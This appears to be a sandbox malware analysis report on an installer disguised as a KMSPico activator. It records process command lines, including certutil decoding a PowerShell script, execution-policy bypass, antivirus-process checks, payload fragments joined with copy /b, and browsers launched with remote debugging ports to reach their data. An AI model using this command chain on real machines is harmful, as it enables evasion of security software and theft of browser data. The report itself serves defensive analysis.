2024-12-17 07:23:15 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 07:23:15 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 07:23:15 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 07:23:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:23:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:23:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Target ID:	0
Start time:	02:21:08
Start date:	17/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\69633f.msi"
Imagebase:	0x7ff7bee60000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:21:11
Start date:	17/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7bee60000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:21:11
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding D70795A19597363BCA1BA6E959046918 C
Imagebase:	0xf90000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:21:26
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 98F0657E4B4BD5B7A8EF6A74F6816EC8
Imagebase:	0xf90000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:21:27
Start date:	17/12/2024
Path:	C:\Windows\Installer\MSIC534.tmp
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Installer\MSIC534.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat"
Imagebase:	0x7ff6d9bf0000
File size:	548'192 bytes
MD5 hash:	250DA78FACCE68224B24D0FFAD65CA8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:21:27
Start date:	17/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" "
Imagebase:	0x7ff7a9bc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:21:27
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:21:27
Start date:	17/12/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -decode -f C:\Users\user~1\AppData\Local\Temp\2975.ps1 C:\Users\user~1\AppData\Local\Temp\2975.ps1
Imagebase:	0x7ff7cb7b0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:21:27
Start date:	17/12/2024
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs"
Imagebase:	0x7ff627ec0000
File size:	161'280 bytes
MD5 hash:	24590BF74BBBBFD7D7AC070F4E3C44FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:21:27
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:21:27
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:50:38
Start date:	17/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	03:50:53
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\putt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\putt.exe"
Imagebase:	0x400000
File size:	1'357'367 bytes
MD5 hash:	C6E90B3A98ECB4AB74A9AAF8155D1BC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 18%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:50:53
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:50:53
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:51:00
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:51:00
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x350000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:51:01
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:51:01
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x350000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:51:01
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 615578
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:51:02
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "applied" Manually
Imagebase:	0x350000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	03:51:02
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:51:02
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\615578\Participating.com
Wow64 process (32bit):	true
Commandline:	Participating.com w
Imagebase:	0x4f0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	03:51:03
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x220000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:52:04
Start date:	17/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	03:52:05
Start date:	17/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	03:52:06
Start date:	17/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2356,i,6525956893070275534,18255261071347159219,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	03:52:20
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.6%
Total number of Nodes:	314
Total number of Limit Nodes:	15

Executed Functions

Function 00007FF6D9BF6AC0 Relevance: 42.5, APIs: 28, Instructions: 480
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D9BF57F0: GetCurrentProcess.KERNEL32 ref: 00007FF6D9BF57FD
Part of subcall function 00007FF6D9BF57F0: OpenProcessToken.ADVAPI32 ref: 00007FF6D9BF5810

CoInitializeEx.COMBASE ref: 00007FF6D9BF6B44
CoCreateInstance.COMBASE ref: 00007FF6D9BF6B7C
CoUninitialize.COMBASE ref: 00007FF6D9BF71C2

Part of subcall function 00007FF6D9BF72B0: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6D9BF744D

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF71EF

Part of subcall function 00007FF6D9BF17D0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9BF38C9), ref: 00007FF6D9BF1811

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF7200
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF721C

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Process$CreateCurrentDirectoryFreeInitializeInstanceLocalOpenTokenUninitializeWindows
String ID:
API String ID: 822888269-0
Opcode ID: 05dfd14b6fad02eb0e5439a3471fccad0f1740c3acfe04560c7ae6758e09d47f
Instruction ID: 0aabf17525e1985ea752eda1652c19bc27e835d17d57b8ee290b24c6fe465ca0
Opcode Fuzzy Hash: 05dfd14b6fad02eb0e5439a3471fccad0f1740c3acfe04560c7ae6758e09d47f
Instruction Fuzzy Hash: 4A228C26A09B8A89EB108F65D8403BE63B0FF45B88F514137DA4D97B68DF3DE559C340

Function 00007FF6D9C40F78 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000000,00007FF6D9C4180E,?,?,?,00007FF6D9C41791), ref: 00007FF6D9C40FE5
GetLastError.KERNEL32(?,00000000,00000000,00007FF6D9C4180E,?,?,?,00007FF6D9C41791), ref: 00007FF6D9C40FF7
LoadLibraryExW.KERNEL32(?,00000000,00000000,00007FF6D9C4180E,?,?,?,00007FF6D9C41791), ref: 00007FF6D9C41039
VirtualProtect.KERNELBASE ref: 00007FF6D9C41095
VirtualProtect.KERNELBASE ref: 00007FF6D9C410C6
FreeLibrary.KERNEL32(?,00000000,00000000,00007FF6D9C4180E,?,?,?,00007FF6D9C41791), ref: 00007FF6D9C4110A
GetProcAddress.KERNEL32(?,00000000,00000000,00007FF6D9C4180E,?,?,?,00007FF6D9C41791), ref: 00007FF6D9C41116

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 00007FF6D9C41147, 00007FF6D9C41155
ext-ms-, xrefs: 00007FF6D9C4101E
api-ms-, xrefs: 00007FF6D9C4100B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: a892a654b5abf7ec54ac486c8a32eee7bee7496938f6da5fac79cc0bf8a6e840
Instruction ID: 39bcb0af2a1ff103ec125a918f16f75c34d49fd50924e117c019af9a06981b59
Opcode Fuzzy Hash: a892a654b5abf7ec54ac486c8a32eee7bee7496938f6da5fac79cc0bf8a6e840
Instruction Fuzzy Hash: FC518B21F0964641EA659F66A8406BD22B0AF58BF0F880736DE7D877D0EF3CF4658B00

Function 00007FF6D9BF57F0 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6D9BF57FD
OpenProcessToken.ADVAPI32 ref: 00007FF6D9BF5810
GetTokenInformation.KERNELBASE ref: 00007FF6D9BF5855
CloseHandle.KERNEL32 ref: 00007FF6D9BF586C

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 83c2ad7f33d6766a2455fcf55cb19f89b58c7c6f92fe8b6ef7896216a17a9331
Instruction ID: 86451cb1dfff4eec2a1cbe782617c3644268ca5f0222a8eb22a00263c21fb355
Opcode Fuzzy Hash: 83c2ad7f33d6766a2455fcf55cb19f89b58c7c6f92fe8b6ef7896216a17a9331
Instruction Fuzzy Hash: DA01FF7661D68283EB908F51E4443AEB7B0FBD1785F940026EB8D83A54DF7DC519CB00

Function 00007FF6D9C02410 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 00007FF6D9C0243B

Part of subcall function 00007FF6D9BF4890: LocalAlloc.KERNEL32 ref: 00007FF6D9BF48BB

Strings

Full command line:, xrefs: 00007FF6D9C02471

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: AllocCommandLineLocal
String ID: Full command line:
API String ID: 2661623471-831861440
Opcode ID: 10fe9c3086584ecdcabbb76e3bc630f7c0bbf28254d0d94bbd84ecf09f4de2d3
Instruction ID: 51761cbd518a57cd371e56a41e5117b21f21008adb273849aa8afc78adee0a1b
Opcode Fuzzy Hash: 10fe9c3086584ecdcabbb76e3bc630f7c0bbf28254d0d94bbd84ecf09f4de2d3
Instruction Fuzzy Hash: 3841C312A19A8691EB00EF64D4511FE6370FF913C8F815433EA4E876AAEF3DD669C740

Function 00007FF6D9BF7D90 Relevance: 4.6, APIs: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6D9BF7D7A), ref: 00007FF6D9BF7DE1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6D9BF7D7A), ref: 00007FF6D9BF7DEB
GetTokenInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6D9BF7D7A), ref: 00007FF6D9BF7E5F

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: 81ab0e5410798fe9c69e99d4eda4d9889cd92e25074a5a686ed3b1c35950dab2
Instruction ID: 7ebcf198cb08a0f0df37ac7d3b9ff22ee848be06a2ec0a2aab79cbf3723ea9a7
Opcode Fuzzy Hash: 81ab0e5410798fe9c69e99d4eda4d9889cd92e25074a5a686ed3b1c35950dab2
Instruction Fuzzy Hash: AF213036B19B8586D7508F25E94026E73A5F789BC8F244136DB4D83B58DF3DE4618B00

Function 00007FF6D9C2849C Relevance: 3.1, APIs: 2, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D9C27F00: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6D9C27F14

__scrt_release_startup_lock.LIBCMT ref: 00007FF6D9C2852E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6D9C28581

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

